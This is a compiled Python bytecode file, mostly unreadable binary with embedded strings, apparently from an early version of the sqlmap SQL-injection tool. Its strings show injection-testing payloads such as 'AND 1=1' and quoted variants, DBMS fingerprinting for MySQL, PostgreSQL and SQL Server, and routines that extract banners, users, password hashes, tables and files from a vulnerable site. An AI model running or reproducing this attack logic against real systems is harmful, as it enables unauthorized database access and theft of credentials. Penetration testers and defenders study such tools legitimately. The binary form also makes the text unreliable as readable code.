³ò ‰ŸFc @s‚ddkZddkZddklZddklZddklZddkl Z ddk l Z defd„ƒYZ dS( iÿÿÿÿN(tDump(t UnionCheck(tMySQLMap(t PostgreSQLMap(tMSSQLServerMapt InjectioncBs_eZdZd„Zd„Zd„Zd„Zd„Zd„Zd„Z d„Z d „Z RS( s¥ This class defines methods to check url stability, parameters dynamicity and perform SQL injection on affected parameters @author: Bernardo Damele cCstidƒ|_dS(Nt sqlmapLog(tloggingt getLoggertlogger(tself((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__init__scCs!|iidjo(t|iƒ}|iƒo|Sqnã|iidjo(t|iƒ}|iƒo|Sqn¨|iidjo(t|iƒ}|iƒo|Sqnmt|iƒ}|iƒo|Snt|iƒ}|iƒo|Snt|iƒ}|iƒo|SndS(sW This method fingerprint the remote database management system tmysqlt postgresqlsmicrosoft sql serverN(targstdbmsRt checkDbmsRRtNone(R tapp((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__getDbHandlers,         cCs5|iƒ}|pd}|d7}t|‚nd|iƒGHtƒ}|iio|id|iƒƒn|iio|id|iƒƒn|iio|id|iƒƒn|ii o|id|i ƒƒn|ii o|i d|i ƒƒn|ii o|i d |i ƒƒn|iio|i d |iƒƒn|iio|i|iƒƒn|iio|i|iƒƒn|iio|i|iƒƒn|iio)|i|ii|i|iiƒƒn|iio)|i|ii|i|iiƒƒnd S( sÓ This method exploit the SQL injection on the affected url parameter and extract requested data from the remote database management system or operating system if possible s&it is not possible to fingerprint the s!remote database management systemsremote DBMS: %s s valid uniontbanners current userscurrent databasesdatabase userssdatabase users password hashessavailable databasesN(t_Injection__getDbHandlert ExceptiontgetFingerprintRRt unionChecktstringt getBannertgetCurrentUsert getCurrentDbtgetUserstlisttgetPasswordHashestpasswordHashestgetDbst getTablestdbTablest getColumnstdbTableColumnst dumpTablet dbTableValuestfilenametgetFilet expressiontgetExpr(R RterrMsgtdumper((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt __exploit<sD                 cCsd}|d|7}|ii|ƒ|i||d|ƒ}|i|ƒ}||iijoÚ|i||d|ƒ}|i|ƒ}||iijo›d}|d|7}|ii|ƒ|i||d|ƒ}|i|ƒ}||iijo8d|}|d7}|ii|ƒd |i_tSq5q9nd |}|d7}|ii|ƒd }|d|7}|ii|ƒ|i||d |ƒ}|i|ƒ}||iijoÚ|i||d |ƒ}|i|ƒ}||iijo›d}|d|7}|ii|ƒ|i||d|ƒ}|i|ƒ}||iijo8d|}|d7}|ii|ƒd|i_tSq’q–nd |}|d7}|ii|ƒd}|d|7}|ii|ƒ|i||d|ƒ}|i|ƒ}||iijoÚ|i||d|ƒ}|i|ƒ}||iijo›d}|d|7}|ii|ƒ|i||d|ƒ}|i|ƒ}||iijo8d|}|d7}|ii|ƒd|i_tSqïqónd |}|d7}|ii|ƒtS(s This method checks if the url parameter is affected by a SQL injection vulnerability and identifies the type of SQL injection: * Numeric/Unescaped injection * String/Single quote injection * String/Double quotes injection s$testing numeric/unescaped injection son parameter '%s's %s AND 1=1s %s AND 1=2s'confirming numeric/unescaped injection s%s AND NoValuesparameter '%s' is snumeric/unescaped injectabletnumericsparameter '%s' is not s&testing string/single quote injection s%s' AND '1'='1s%s' AND '1'='2s)confirming string/single quote injection s%s' and NoValuesstring/single quote injectablet stringsingles'testing string/double quotes injection s%s" AND "1"="1s%s" AND "1"="2s*confirming string/double quotes injection s%s" AND "NoValuesstring/double quotes injectablet stringdouble( R tinfot urlReplacet queryPageRt defaultResulttinjectionMethodtTruetFalse(R t parametertvaluetlogMsgturlt trueResultt falseResult((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__checkSqlInjectionwsŒ                cCs]d}|d|7}|ii|ƒ|i||ƒpd|}|ii|ƒn|SdS(sn This method checks if the url parameter is affected by a SQL injection vulnerability stesting sql injection on sparameter '%s's parameter '%s' is not injectableN(R R2t_Injection__checkSqlInjectiontwarn(R R9R:R;twarnMsg((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__checkSqlInjectionPrefaceås c CsÍ|i||dƒ}|i|ƒ}|ii|jotSnd|}|ii|ƒ|i||dƒ}|i|ƒ}|i||dƒ}|i|ƒ}|ii|j}||ii|jO}|S(sÄ This method checks if the url parameter is dynamic. If it is dynamic, the content of the page differs, otherwise the dynamicity might depend on another parameter. t47s)confirming that '%s' parameter is dynamics'NoValues"NoValue(R3R4RR5R8R R2( R R9R:R<t dynResult1R;t dynResult2t dynResult3t condition((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__checkDynParamös cCsy|i|iiƒ}tidƒ|i|iiƒ}tidƒ|i|iiƒ}||j}|||jM}|S(s< This method checks if the url is stable requesting the same page three times with a small delay within each request to assume it is stable. In case the content of the page differs when requesting the same page, the dynamicity might depend on other settings. gà?(R4RR<ttimetsleep(R t firstResultt secondResultt thirdResultRH((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__checkUrlStables    cCsd|i_y|i|iiƒ|i_WnKd}|iio|d7}|ii|ƒqy|d7}t |‚nX|ii p‰d}|ii |ƒ|i ƒpLd}|d7}|iio"|d7}|ii|ƒdSq t |‚qd}|ii |ƒnxî|ii iƒD]Ú\}}|iio;||iijo(|i||ƒ}|o|Sqvq"nd |}|ii |ƒ|i||ƒpd |}|ii|ƒq"d |}|ii |ƒ|i||ƒ}|o|Sq"q"WdS( sz This method performs checks on the target url and SQL injection on the vulnerable url parameters s#unable to connect to the target urls, skipping to next urls or proxys0testing if the url is stable, wait a few secondssurl is not stable, unable sto test for SQL injectionNs url is stables$testing if '%s' parameter is dynamicsparameter '%s' is not dynamicsparameter '%s' is dynamic(RRt injParameterR4R<R5t googleDorkR RARRR2t_Injection__checkUrlStablet parameterstitemst urlParametert$_Injection__checkSqlInjectionPrefacet_Injection__checkDynParam(R RBR;R,R9R:RP((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyt__effectiveRun+sR                 c CsÊ||_|iio:|iƒ|i_|iip td‚n|iƒntd}xj|iiD]\}|d7}d||f}|d7}tdti dƒ|fƒ}| p|ddjoqcnd |}|i i |ƒh|i_ ||i_|i ƒ\}}| p| oqcn|i|ƒ|i_ |ii pqcn|iƒ|i_|iioPd }tdti dƒ|fƒ} | p| ddjo|iƒq¿qcqcW|iS(s This method performs checks on the target url(s) and perform SQL injection on vulnerable url parameters s!all parameters are not injectableiis url %d: %s, s$do you want to test this url? [y/N] s[%s] [INFO] %ss%XtntNstesting url %ss1do you want to exploit this SQL injection? [Y/n] tytY(RYRZ(R[R\(RR<t_Injection__effectiveRunRPRt_Injection__exploitt testableHostst raw_inputRJtstrftimeR R2RStroughParameterst paramDict( R t checkedArgst hostCountt testableHosttmessagettestR;R<RStexploit((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pytrunms@            ( t__name__t __module__t__doc__R RR^R@RVRWRRR]Rj(((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyRs  " ; n    B( RRJtlib.dumpRt lib.unionRtplugins.mysqlmapRtplugins.postgresqlmapRtplugins.mssqlservermapRR(((s7/usr/local/www/apache22/data/stuff/sql/lib/injection.pyss